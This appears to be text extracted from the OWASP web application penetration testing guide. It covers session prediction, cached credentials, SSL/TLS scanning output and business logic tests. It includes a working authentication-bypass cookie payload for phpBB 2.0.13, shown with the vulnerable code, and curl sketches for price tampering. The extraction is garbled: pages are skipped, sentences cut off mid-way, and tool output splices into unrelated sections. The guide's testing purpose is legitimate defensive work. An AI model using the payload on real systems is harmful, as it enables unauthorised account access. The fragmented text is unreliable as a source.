an application which processes online payments on behalf of thirdparty traders may contain a variety of bespoke functionality which can (normally) only be found by following links within the web sites of its customers. File name filter bypass Because blacklist filters are based on regular expressions, one can sometimes take advantage of obscure OS file name expansion features in which work in ways the developer didn’t expect. The tester can sometimes exploit differences in ways that file names are parsed by the application, web server, and underlying OS and it’s file name conventions. Example: Windows 8.3 filename expansion “c:\program files” becomes “C:\PROGRA~1” – Remove incompatible characters – Convert spaces to underscores - Take the first six characters of the basename – Add “~You Are Authenticated
72 Web Application Penetration Testing Session ID Prediction Many web applications manage authentication by using session identifiers (session IDs). Therefore, if session ID generation is predictable, a malicious user could be able to find a valid session ID and gain unauthorized access to the application, impersonating a previously authenticated user. The following figure shows that with a simple SQL injection attack, it is sometimes possible to bypass the authentication form. In the following figure, values inside cookies increase linearly, so it could be easy for an attacker to guess a valid session ID. n the following figure, values inside cookies change only partially, so it’s possible to restrict a brute force attack to the defined fields shown below. SQL Injection (HTML Form Authentication) SQL Injection is a widely known attack technique. This section is not going to describe this technique in detail as there are several sections in this guide that explain injection techniques beyond the scope of this section. Gray Box Testing If an attacker has been able to retrieve the application source code by exploiting a previously discovered vulnerability (e.g., directory traversal), or from a web repository (Open Source Applications), it could be possible to perform refined attacks against the implementation of the authentication process. In the following example (PHPBB 2.0.13 - Authentication Bypass Vulnerability), at line 5 the unserialize() function parses a user supplied cookie and sets values inside the $row array. At line 10 the user’s MD5 password hash stored inside the back end database is compared to the one supplied. In PHP, a comparison between a string value and a boolean value 1. if ( isset($HTTP_COOKIE_VARS[$cookiename . ‘_sid’]) || 2. { 3. $sessiondata = isset( $HTTP_COOKIE_VARS[$cookiename . ‘_data’] ) ? 4. 5. unserialize(stripslashes($HTTP_COOKIE_VARS[$cookiename . ‘_data’])) : array(); 6. 7. $sessionmethod = SESSION_METHOD_COOKIE; 8. } 9. 10. if( md5($password) == $row[‘user_password’] && $row[‘user_active’] ) 11. 12. { 13. $autologin = ( isset($HTTP_POST_VARS[‘autologin’]) ) ? TRUE : 0; 14. } (1 - “TRUE”) is always “TRUE”, so by supplying the following string (the important part is “b:1”) to the unserialize() function, it is possible to bypass the authentication control: a:2:{s:11:”autologinid”;b:1;s:6:”userid”;s:1:”2”;} 73 Web Application Penetration Testing Tools • WebScarab • WebGoat • OWASP Zed Attack Proxy (ZAP) References Whitepapers • Mark Roxberry: “PHPBB 2.0.13 vulnerability” • David Endler: “Session ID Brute Force Exploitation and Prediction” - http://www.cgisecurity.com/lib/SessionIDs.pdf Testing for Vulnerable Remember Password (OTG-AUTHN-005) Summary Browsers will sometimes ask a user if they wish to remember the password that they just entered. The browser will then store the password, and automatically enter it whenever the same authentication form is visited. This is a convenience for the user. Additionally some websites will offer custom “remember me” functionality to allow users to persist log ins on a specific client system. Having the browser store passwords is not only a convenience for end-users, but also for an attacker. If an attacker can gain access to the victim’s browser (e.g. through a Cross Site Scripting attack, or through a shared computer), then they can retrieve the stored passwords. 
It is not uncommon for browsers to store these passwords in an easily retrievable manner, but even if the browser were to store the passwords encrypted and only retrievable through the use of a master password, an attacker could retrieve the password by visiting the target web application’s authentication form, entering the victim’s username, and letting the browser to enter the password. Additionally where custom “remember me” functions are put in place weaknesses in how the token is stored on the client PC (for example using base64 encoded credentials as the token) could expose the users passwords. Since early 2014 most major browsers will override any use of autocomplete=”off” with regards to password forms and as a result previous checks for this are not required and recommendations should not commonly be given for disabling this feature. However this can still apply to things like secondary secrets which may be stored in the browser inadvertently. How to Test • Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. • Examine the hashing mechanism: if it is a common, well-known algorithm, check for its strength; in homegrown hash functions, attempt several usernames to check whether the hash function is easily guessable. • Verify that the credentials are only sent during the log in phase, and not sent together with every request to the application. • Consider other sensitive form fields (e.g. an answer to a secret question that must be entered in a password recovery or account unlock form). Remediation Ensure that no credentials are stored in clear text or are easily retrievable in encoded or encrypted forms in cookies. Testing for Browser cache weakness (OTG-AUTHN-006) Summary In this phase the tester checks that the application correctly instructs the browser to not remember sensitive data. Browsers can store information for purposes of caching and history. Caching is used to improve performance, so that previously displayed information doesn’t need to be downloaded again. History mechanisms are used for user convenience, so the user can see exactly what they saw at the time when the resource was retrieved. If sensitive information is displayed to the user (such as their address, credit card details, Social Security Number, or username), then this information could be stored for purposes of caching or history, and therefore retrievable through examining the browser’s cache or by simply pressing the browser’s “Back” button. How to Test Browser History Technically, the “Back” button is a history and not a cache (see http://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html#sec13.13). The cache and the history are two different entities. However, they share the same weakness of presenting previously displayed sensitive information. The first and simplest test consists of entering sensitive information into the application and logging out. Then the tester clicks the “Back” button of the browser to check whether previously displayed sensitive information can be accessed whilst unauthenticated. If by pressing the “Back” button the tester can access previous pages but not access new ones, then it is not an authentication issue, but a browser history issue. If these pages contain sensitive data, it means that the application did not forbid the browser from storing it. Authentication does not necessarily need to be involved in the testing. 
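On the server side, the caching directives that should accompany any page displaying sensitive data can be checked with an intercepting proxy, as described below, or with a single request. The following sketch uses curl; the URL and the session cookie value are placeholders.

#!/bin/bash
# Sketch: fetch a page known to display sensitive data and inspect the caching
# directives returned by the server. URL and session cookie are placeholders.
curl -s -k -D - -o /dev/null \
     -H 'Cookie: JSESSIONID=<valid session id>' \
     'https://www.example.com/account/profile' \
  | grep -iE '^(cache-control|pragma|expires):'
# The absence of these headers, or permissive values, means the page may be
# written to the browser cache or to intermediate caches.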
For example, when a user enters their email address in order to sign up to a newsletter, this information could be retrievable if not properly handled. The “Back” button can be stopped from showing sensitive data. This can be done by: • Delivering the page over HTTPS. • Setting Cache-Control: must-re-validate Browser Cache Here testers check that the application does not leak any sensitive data into the browser cache. In order to do that, they can use a proxy (such as WebScarab) and search through the server responses that belong to the session, checking that for every page that contains sensitive information the server instructed the browser not to cache any data. Such a directive can be issued in the HTTP response headers: 74 Web Application Penetration Testing • Cache-Control: no-cache, no-store • Expires: 0 • Pragma: no-cache These directives are generally robust, although additional flags may be necessary for the Cache-Control header in order to better prevent persistently linked files on the filesystem. These include: • Cache-Control: must-revalidate, pre-check=0, post-check=0, max-age=0, s-maxage=0 Testing for Weak password policy (OTG-AUTHN-007) Summary The most prevalent and most easily administered authentication mechanism is a static password. The password represents the keys to the kingdom, but is often subverted by users in the name of usability. In each of the recent high profile hacks that have revealed user credentials, it is lamented that most common passwords are still: 123456, password and qwerty. HTTP/1.1: Cache-Control: no-cache Test objectives Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of passwords. HTTP/1.0: Pragma: no-cache Expires:http://
Invalid login credentials! Testing for Weak SSL/TLS Ciphers/Protocols/Keys vulnerabilities The large number of available cipher suites and quick progress in cryptanalysis makes testing an SSL server a non-trivial task. At the time of writing these criteria are widely recognized as minimum checklist: • Weak ciphers must not be used (e.g. less than 128 bits [10]; no NULL ciphers suite, due to no encryption used; no Anonymous Diffie-Hellmann, due to not provides authentication). • Weak protocols must be disabled (e.g. SSLv2 must be disabled, due to known weaknesses in protocol design [11]). • Renegotiation must be properly configured (e.g. Insecure Renegotiation must be disabled, due to MiTM attacks [12] and Client-initiated Renegotiation must be disabled, due to Denial of Service vulnerability [13]). • No Export (EXP) level cipher suites, due to can be easly broken [10]. • X.509 certificates key length must be strong (e.g. if RSA or DSA is used the key must be at least 1024 bits). • X.509 certificates must be signed only with secure hashing algoritms (e.g. not signed using MD5 hash, due to known collision attacks on this hash). • Keys must be generated with proper entropy (e.g, Weak Key Generated with Debian) [14]. A more complete checklist includes: • Secure Renegotiation should be enabled. • MD5 should not be used, due to known collision attacks. [35] • RC4 should not be used, due to crypto-analytical attacks [15]. • Server should be protected from BEAST Attack [16]. • Server should be protected from CRIME attack, TLS compres sion must be disabled [17]. • Server should support Forward Secrecy [18]. The following standards can be used as reference while assessing SSL servers: • PCI-DSS v2.0 in point 4.1 requires compliant parties to use “strong cryptography” without precisely defining key lengths and algorithms. Common interpretation, partially based on previous versions of the standard, is that at least 128 bit key cipher, no export strength algorithms and no SSLv2 should be used [19]. • Qualys SSL Labs Server Rating Guide [14], Depoloyment best practice [10] and SSL Threat Model [20] has been proposed to standardize SSL server assessment and configuration. But is less updated than the SSL Server tool [21]. • OWASP has a lot of resources about SSL/TLS Security [22], [23], [24], [25]. [26]. Some tools and scanners both free (e.g. SSLAudit [28] or SSLScan [29]) and commercial (e.g. Tenable Nessus [27]), can be used to assess SSL/TLS vulnerabilities. But due to evolution of these vulnerabilities a good way to test is to check them manually with openssl [30] or use the tool’s output as an input for manual evaluation using the references. Sometimes the SSL/TLS enabled service is not directly accessible and the tester can access it only via a HTTP proxy using CONNECT method [36]. Most of the tools will try to connect to desired tcp port to start SSL/TLS handshake. This will not work since desired port is accessible only via HTTP proxy. The tester can easily circumvent this by using relaying software such as socat [37]. Example 2. SSL service recognition via nmap The first step is to identify ports which have SSL/TLS wrapped services. Typically tcp ports with SSL for web and mail services are but not limited to - 443 (https), 465 (ssmtp), 585 (imap4-ssl), 993 (imaps), 995 (ssl-pop). In this example we search for SSL services using nmap with “-sV” option, used to identify services and it is also able to identify SSL services [31]. 
Other options are for this particular example and must be customized. Often in a Web Application Penetration Test scope is limited to port 80 and 443. $ nmap -sV --reason -PN -n --top-ports 100 www.example. com Starting Nmap 6.25 ( http://nmap.org ) at 2013-01-01 00:00 CEST Nmap scan report for www.example.com (127.0.0.1) Host is up, received user-set (0.20s latency). Not shown: 89 filtered ports Reason: 89 no-responses PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack Pure-FTPd 22/tcp open ssh syn-ack OpenSSH 5.3 (protocol 2.0) 25/tcp open smtp syn-ack Exim smtpd 4.80 26/tcp open smtp syn-ack Exim smtpd 4.80 80/tcp open http syn-ack 110/tcp open pop3 syn-ack Dovecot pop3d 143/tcp open imap syn-ack Dovecot imapd 443/tcp open ssl/http syn-ack Apache 465/tcp open ssl/smtp syn-ack Exim smtpd 4.80 993/tcp open ssl/imap syn-ack Dovecot imapd 995/tcp open ssl/pop3 syn-ack Dovecot pop3d Service Info: Hosts: example.com Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 131.38 seconds 161 Web Application Penetration Testing Example 3. Checking for Certificate information, Weak Ciphers and SSLv2 via nmap Nmap has two scripts for checking Certificate information, Weak Ciphers and SSLv2 [31]. $ nmap --script ssl-cert,ssl-enum-ciphers -p 443,465,993,995 www.example.com Starting Nmap 6.25 ( http://nmap.org ) at 2013-01-01 00:00 CEST Nmap scan report for www.example.com (127.0.0.1) Host is up (0.090s latency). rDNS record for 127.0.0.1: www.example.com PORT STATE SERVICE 443/tcp open https | ssl-cert: Subject: commonName=www.example.org | Issuer: commonName=******* | Public Key type: rsa | Public Key bits: 1024 | Not valid before: 2010-01-23T00:00:00+00:00 | Not valid after: 2020-02-28T23:59:59+00:00 | MD5: ******* |_SHA-1: ******* | ssl-enum-ciphers: | SSLv3: | ciphers: | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL | TLSv1.0: | ciphers: | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL |_ least strength: strong 465/tcp open smtps | ssl-cert: Subject: commonName=*.exapmple.com | Issuer: commonName=******* | Public Key type: rsa | Public Key bits: 2048 | Not valid before: 2010-01-23T00:00:00+00:00 | Not valid after: 2020-02-28T23:59:59+00:00 | MD5: ******* |_SHA-1: ******* | ssl-enum-ciphers: | SSLv3: | ciphers: | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL | TLSv1.0: | ciphers: | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL |_ least strength: strong 993/tcp open imaps | ssl-cert: Subject: commonName=*.exapmple.com | Issuer: commonName=******* | Public Key type: rsa | Public Key bits: 2048 | Not valid before: 2010-01-23T00:00:00+00:00 | Not valid after: 2020-02-28T23:59:59+00:00 | MD5: ******* |_SHA-1: ******* | ssl-enum-ciphers: | SSLv3: | ciphers: | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL | TLSv1.0: | ciphers: | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL |_ least strength: strong 995/tcp open pop3s | 
ssl-cert: Subject: commonName=*.exapmple.com | Issuer: commonName=******* | Public Key type: rsa | Public Key bits: 2048 | Not valid before: 2010-01-23T00:00:00+00:00 | Not valid after: 2020-02-28T23:59:59+00:00 | MD5: ******* |_SHA-1: ******* | ssl-enum-ciphers: | SSLv3: | ciphers: | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL | TLSv1.0: | ciphers: | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL |_ least strength: strong Nmap done: 1 IP address (1 host up) scanned in 8.64 seconds 162 Web Application Penetration Testing Example 4 Checking for Client-initiated Renegotiation and Secure Renegotiation via openssl (manually) Openssl [30] can be used for testing manually SSL/TLS. In this example the tester tries to initiate a renegotiation by client [m] connecting to server with openssl. The tester then writes the fist line of an HTTP request and types “R” in a new line. He then waits for renegotiaion and completion of the HTTP request and checks if secure renegotiaion is supported by looking at the server output. Using manual requests it is also possible to see if Compression is enabled for TLS and to check for CRIME [13], for ciphers and for other vulnerabilities. $ openssl s_client -connect www2.example.com:443 CONNECTED(00000003) depth=2 ****** verify error:num=20:unable to get local issuer certificate verify return:0 --Certificate chain 0 s:****** i:****** 1 s:****** i:****** 2 s:****** i:****** --Server certificate -----BEGIN CERTIFICATE----****** -----END CERTIFICATE----subject=****** issuer=****** --No client certificate CA names sent --SSL handshake has read 3558 bytes and written 640 bytes --New, TLSv1/SSLv3, Cipher is DES-CBC3-SHA Server public key is 2048 bit Secure Renegotiation IS NOT supported Compression: NONE Expansion: NONE SSL-Session: Protocol : TLSv1 Cipher : DES-CBC3-SHA Session-ID: ****** Session-ID-ctx: Master-Key: ****** Key-Arg : None PSK identity: None PSK identity hint: None SRP username: None Start Time: ****** Timeout : 300 (sec) Verify return code: 20 (unable to get local issuer certificate) --- Now the tester can write the first line of an HTTP request and then R in a new line. HEAD / HTTP/1.1 R Server is renegotiating RENEGOTIATING depth=2 C****** verify error:num=20:unable to get local issuer certificate verify return:0 And the tester can complete our request, checking for response. Even if the HEAD is not permitted, Client-intiated renegotiaion is permitted. HEAD / HTTP/1.1 HTTP/1.1 403 Forbidden ( The server denies the specified Uniform Resource Locator (URL). Contact the server administrator. ) Connection: close Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Content-Length: 1792 read:errno=0 Example 5. Testing supported Cipher Suites, BEAST and CRIME attacks via TestSSLServer TestSSLServer [32] is a script which permits the tester to check the cipher suite and also for BEAST and CRIME attacks. BEAST (Browser Exploit Against SSL/TLS) exploits a vulnerability of CBC in TLS 1.0. CRIME (Compression Ratio Info-leak Made Easy) exploits a vulnerability of TLS Compression, that should be disabled. What is interesting is that the first fix for BEAST was the use of RC4, but this is now discouraged due to a crypto-analytical attack to RC4 [15]. An online tool to check for these attacks is SSL Labs, but can be used only for internet facing servers. 
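For servers that cannot be submitted to an online service, individual protocol versions can also be probed manually with openssl s_client, in the same spirit as the renegotiation test shown earlier. The sketch below is only an outline: which protocol flags are available depends on how the local openssl binary was built, and unsupported flags will simply fail.

#!/bin/bash
# Sketch: probe individual protocol versions with openssl s_client. Flag
# availability depends on the local openssl build; a completed handshake on
# -ssl2 or -ssl3 indicates a weak protocol is still enabled.
host=www.example.com
for proto in -ssl2 -ssl3 -tls1 -tls1_1 -tls1_2; do
    printf '%s\t' "$proto"
    echo | openssl s_client $proto -connect "$host:443" 2>/dev/null \
        | grep -E 'Protocol *:|Cipher *:' | tr '\n' ' '
    echo
done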
Also consider that target data will be stored on SSL Labs server and also will result some connection from SSL Labs server [21]. $ java -jar TestSSLServer.jar www3.example.com 443 Supported versions: SSLv3 TLSv1.0 TLSv1.1 TLSv1.2 Deflate compression: no Supported cipher suites (ORDER IS NOT SIGNIFICANT): SSLv3 RSA_WITH_RC4_128_SHA RSA_WITH_3DES_EDE_CBC_SHA DHE_RSA_WITH_3DES_EDE_CBC_SHA RSA_WITH_AES_128_CBC_SHA DHE_RSA_WITH_AES_128_CBC_SHA 163 Web Application Penetration Testing RSA_WITH_AES_256_CBC_SHA DHE_RSA_WITH_AES_256_CBC_SHA RSA_WITH_CAMELLIA_128_CBC_SHA DHE_RSA_WITH_CAMELLIA_128_CBC_SHA RSA_WITH_CAMELLIA_256_CBC_SHA DHE_RSA_WITH_CAMELLIA_256_CBC_SHA TLS_RSA_WITH_SEED_CBC_SHA TLS_DHE_RSA_WITH_SEED_CBC_SHA (TLSv1.0: idem) (TLSv1.1: idem) TLSv1.2 RSA_WITH_RC4_128_SHA RSA_WITH_3DES_EDE_CBC_SHA DHE_RSA_WITH_3DES_EDE_CBC_SHA RSA_WITH_AES_128_CBC_SHA DHE_RSA_WITH_AES_128_CBC_SHA RSA_WITH_AES_256_CBC_SHA DHE_RSA_WITH_AES_256_CBC_SHA RSA_WITH_AES_128_CBC_SHA256 RSA_WITH_AES_256_CBC_SHA256 RSA_WITH_CAMELLIA_128_CBC_SHA DHE_RSA_WITH_CAMELLIA_128_CBC_SHA DHE_RSA_WITH_AES_128_CBC_SHA256 DHE_RSA_WITH_AES_256_CBC_SHA256 RSA_WITH_CAMELLIA_256_CBC_SHA DHE_RSA_WITH_CAMELLIA_256_CBC_SHA TLS_RSA_WITH_SEED_CBC_SHA TLS_DHE_RSA_WITH_SEED_CBC_SHA TLS_RSA_WITH_AES_128_GCM_SHA256 TLS_RSA_WITH_AES_256_GCM_SHA384 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 ---------------------Server certificate(s): ****** ---------------------Minimal encryption strength: strong encryption (96-bit or more) Achievable encryption strength: strong encryption (96-bit or more) BEAST status: vulnerable CRIME status: protected Example 6. Testing SSL/TLS vulnerabilities with sslyze Sslyze [33] is a python script which permits mass scanning and XML output. The following is an example of a regular scan. It is one of the most complete and versatile tools for SSL/TLS testing ./sslyze.py --regular example.com:443 REGISTERING AVAILABLE PLUGINS ----------------------------- PluginHSTS PluginSessionRenegotiation PluginCertInfo PluginSessionResumption PluginOpenSSLCipherSuites PluginCompression CHECKING HOST(S) AVAILABILITY ----------------------------example.com:443 => 127.0.0.1:443 SCAN RESULTS FOR EXAMPLE.COM:443 - 127.0.0.1:443 --------------------------------------------------* Compression : Compression Support: Disabled * Session Renegotiation : Client-initiated Renegotiations: Rejected Secure Renegotiation: Supported * Certificate : Validation w/ Mozilla’s CA Store: Certificate is NOT Trusted: unable to get local issuer certificate Hostname Validation: MISMATCH SHA1 Fingerprint: ****** Common Name: Issuer: Serial Number: Not Before: Not After: www.example.com ****** **** Sep 26 00:00:00 2010 GMT Sep 26 23:59:59 2020 GMT Signature Algorithm: sha1WithRSAEncryption Key Size: 1024 bit X509v3 Subject Alternative Name: {‘othername’: [‘401 Authorization Required h1> Invalid login credentials! Example 2: Form-Based Authentication Performed over HTTP Another typical example is authentication forms which transmit user authentication credentials over HTTP. In the example below one can see HTTP being used in the “action” attribute of the form. It is also possible to see this issue by examining the HTTP traffic with an interception proxy.
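A quick way to spot the issue shown in Example 2 without a proxy is to fetch the page that hosts the authentication form and inspect its form action attributes. The sketch below uses curl and grep; the URL is a placeholder and the pattern is deliberately simple, so the results still need manual review.

#!/bin/bash
# Sketch: fetch the page hosting the login form (placeholder URL) and extract
# form action attributes to see whether credentials would be posted over HTTP.
curl -s -k 'https://www.example.com/login' \
  | grep -ioE '<form[^>]*action="[^"]*"'
# An action beginning with http:// (or any relative action on a page that is
# itself served over HTTP) means credentials are transmitted unencrypted.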
Example 3: Cookie Containing Session ID Sent over HTTP The Session ID Cookie must be transmitted over protected channels. If the cookie does not have the secure flag set [6] it is permitted for the application to transmit it unencrypted. Note below the setting of the cookie is done without the Secure flag, and the entire log in process is performed in HTTP and not HTTPS. https://secure.example.com/login POST /login HTTP/1.1 Host: secure.example.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://secure.example.com/ Content-Type: application/x-www-form-urlencoded Content-Length: 188 HTTP/1.1 302 Found Date: Tue, 03 Dec 2013 21:18:55 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, maxage=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Set-Cookie: JSESSIONID=BD99F321233AF69593EDF52B123B5BDA; expires=Fri, 01-Jan-2014 00:00:00 GMT; 176 Web Application Penetration Testing path=/; domain=example.com; httponly Location: private/ X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Content-Length: 0 Keep-Alive: timeout=1, max=100 Connection: Keep-Alive Content-Type: text/html ---------------------------------------------------------http://example.com/private GET /private HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://secure.example.com/login Cookie: JSESSIONID=BD99F321233AF69593EDF52B123B5BDA; Connection: keep-alive HTTP/1.1 200 OK Cache-Control: no-store Pragma: no-cache Expires: 0 Content-Type: text/html;charset=UTF-8 Content-Length: 730 Date: Tue, 25 Dec 2013 00:00:00 GMT ---------------------------------------------------------- Tools • [5] curl can be used to check manually for pages References OWASP Resources • [1] OWASP Testing Guide - Testing for Weak SSL/TLS Ciphers, Insufficient Transport Layer Protection (OTG-CRYPST-001) • [2] OWASP TOP 10 2010 - Insufficient Transport Layer Protection • [3] OWASP TOP 10 2013 - Sensitive Data Exposure • [4] OWASP ASVS v1.1 - V10 Communication Security Verification Requirements • [6] OWASP Testing Guide - Testing for Cookies attributes (OTG-SESS-002) Testing for business logic Summary Testing for business logic flaws in a multi-functional dynamic web application requires thinking in unconventional methods. If an application’s authentication mechanism is developed with the intention of performing steps 1, 2, 3 in that specific order to authenticate a user. What happens if the user goes from step 1 straight to step 3? In this simplistic example, does the application provide access by failing open; deny access, or just error out with a 500 message? There are many examples that can be made, but the one constant lesson is “think outside of conventional wisdom”. This type of vulnerability cannot be detected by a vulnerability scanner and relies upon the skills and creativity of the penetration tester. In addition, this type of vulnerability is usually one of the hardest to detect, and usually application specific but, at the same time, usually one of the most detrimental to the application, if exploited. 
The classification of business logic flaws has been under-studied; although exploitation of business flaws frequently happens in real-world systems, and many applied vulnerability researchers investigate them. The greatest focus is in web applications. There is debate within the community about whether these problems represent particularly new concepts, or if they are variations of well-known principles. Testing of business logic flaws is similar to the test types used by functional testers that focus on logical or finite state testing. These types of tests require that security professionals think a bit differently, develop abused and misuse cases and use many of the testing techniques embraced by functional testers. Automation of business logic abuse cases is not possible and remains a manual art relying on the skills of the tester and their knowledge of the complete business process and its rules. Business Limits and Restrictions Consider the rules for the business function being provided by the application. Are there any limits or restrictions on people’s behavior? Then consider whether the application enforces those rules. It’s generally pretty easy to identify the test and analysis cases to verify the application if you’re familiar with the business. If you are a third-party tester, then you’re going to have to use your common sense and ask the business if different operations should be allowed by the application. Sometimes, in very complex applications, the tester will not have a full understanding of every aspect of the application initially. In these situations, it is best to have the client walk the tester through the application, so that they may gain a better understanding of the limits and intended functionality of the application, before the actual test begins. Additionally, having a direct line to the developers (if possible) during testing will help out greatly, if any questions arise regarding the application’s functionality. Description of the Issue Automated tools find it hard to understand context, hence it’s up to a person to perform these kinds of tests. The following two examples will illustrate how understanding the functionality of the application, the developer’s intentions, and some creative “out-of-the-box” thinking can break the application’s logic. The first example starts with a simplistic parameter manipulation, whereas the second is a real world example of a multi-step process leading to completely subvert the application. 177 Web Application Penetration Testing Example 1: Suppose an e-commerce site allows users to select items to purchase, view a summary page and then tender the sale. What if an attacker was able to go back to the summary page, maintaining their same valid session and inject a lower cost for an item and complete the transaction, and then check out? Example 2: Holding/locking resources and keeping others from purchases these items online may result in attackers purchasing items at a lower price. The countermeasure to this problem is to implement timeouts and mechanisms to ensure that only the correct price can be charged. Example 3: What if a user was able to start a transaction linked to their club/ loyalty account and then after points have been added to their account cancel out of the transaction? Will the points/credits still be applied to their account? Business Logic Test Cases Every application has a different business process, application specific logic and can be manipulated in an infinite number of combinations. 
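Example 1 above can be expressed as a simple test case: capture the legitimate checkout request with an intercepting proxy, then replay it with a modified price value while keeping the same valid session. The sketch below shows the replay step with curl; the endpoint, parameter names and cookie are hypothetical and have to be taken from the captured traffic.

#!/bin/bash
# Sketch of the price-manipulation test in Example 1. Endpoint, parameter names
# and the session cookie are hypothetical and come from the captured request.
curl -s -k 'https://shop.example.com/cart/checkout' \
     -H 'Cookie: SESSIONID=<valid session id>' \
     --data 'item_id=1042&quantity=1&unit_price=0.01&action=confirm' \
     -o response.html
# If the order is accepted at the tampered unit_price, the application trusts
# client-supplied pricing data and this business logic check has failed.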
This section provides some common examples of business logic issues but in no way a complete list of all issues. Business Logic exploits can be broken into the following categories: 4.12.1 Test business logic data validation (OTG-BUSLOGIC-001) In business logic data validation testing, we verify that the application does not allow users to insert “unvalidated” data into the system/application. This is important because without this safeguard attackers may be able to insert “unvalidated” data/information into the application/system at “handoff points” where the application/system believes that the data/information is “good” and has been valid since the “entry points” performed data validation as part of the business logic workflow. 4.12.2 Test Ability to forge requests (OTG-BUSLOGIC-002) In forged and predictive parameter request testing, we verify that the application does not allow users to submit or alter data to any component of the system that they should not have access to, are accessing at that particular time or in that particular manner. This is important because without this safeguard attackers may be able to “fool/trick” the application into letting them into sections of thwe application of system that they should not be allowed in at that particular time, thus circumventing the applications business logic workflow. 4.12.3 Test Integrity Checks (OTG-BUSLOGIC-003) In integrity check and tamper evidence testing, we verify that the application does not allow users to destroy the integrity of any part of the system or its data. This is important because without these safe guards attackers may break the business logic workflow and change of compromise the application/system data or cover up actions by altering information including log files. 4.12.4 Test for Process Timing (OTG-BUSLOGIC-004) In process timing testing, we verify that the application does not allow users to manipulate a system or guess its behavior based on input or output timing. This is important because without this safeguard in place attackers may be able to monitor processing time and determine outputs based on timing, or circumvent the application’s business logic by not completing transactions or actions in a timely manner. 4.12.5 Test Number of Times a Function Can be Used Limits (OTG-BUSLOGIC-005) In function limit testing, we verify that the application does not allow users to exercise portions of the application or its functions more times than required by the business logic workflow. This is important because without this safeguard in place attackers may be able to use a function or portion of the application more times than permissible per the business logic to gain additional benefits. 4.12.6 Testing for the Circumvention of Work Flows (OTG-BUSLOGIC-006) In circumventing workflow and bypassing correct sequence testing, we verify that the application does not allow users to perform actions outside of the “approved/required” business process flow. This is important because without this safeguard in place attackers may be able to bypass or circumvent workflows and “checks” allowing them to prematurely enter or skip “required” sections of the application potentially allowing the action/transaction to be completed without successfully completing the entire business process, leaving the system with incomplete backend tracking information. 
4.12.7 Test Defenses Against Application Mis-use (OTG-BUSLOGIC-007) In application mis-use testing, we verify that the application does not allow users to manipulate the application in an unintended manner. 4.12.8 Test Upload of Unexpected File Types (OTG-BUSLOGIC-008) In unexpected file upload testing, we verify that the application does not allow users to upload file types that the system is not expecting or wanted per the business logic requirements. This is important because without these safeguards in place attackers may be able to submit unexpected files such as .exe or .php that could be saved to the system and then executed against the application or system. 4.12.9 Test Upload of Malicious Files (OTG-BUSLOGIC-009) In malicious file upload testing, we verify that the application does not allow users to upload files to the system that are malicious or potentially malicious to the system security. This is important because without these safeguards in place attackers may be able to upload files to the system that may spread viruses, malware or even exploits such as shellcode when executed. Tools While there are tools for testing and verifying that business processes are functioning correctly in valid situations these tools are incapable of detecting logical vulnerabilities. For example, tools have no means of detecting if a user is able to circumvent the business process flow through editing parameters, predicting resource names or escalating privileges to access restricted resources nor do they have any mechanism to help the human 178 Web Application Penetration Testing testers to suspect this state of affairs. The following are some common tool types that can be useful in identifying business logic issues. HP Business Process Testing Software • http://www8.hp.com/us/en/software-solutions/software.html?compURI=1174789#.UObjK3ca7aE Intercepting Proxy - To observe the request and response blocks of HTTP traffic. • Webscarab - https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project • Burp Proxy - http://portswigger.net/burp/proxy.html • Paros Proxy - http://www.parosproxy.org/ Web Browser Plug-ins - To view and modify HTTP/HTTPS headers, post parameters and observe the DOM of the Browser • Tamper Data (for Internet Explorer) - https://addons.mozilla. org/en-us/firefox/addon/tamper-data/ • TamperIE (for Internet Explorer) - http://www.bayden.com/ tamperie/ • Firebug (for Internet Explorer) - https://addons.mozilla.org/enus/firefox/addon/firebug/ and http://getfirebug.com/ 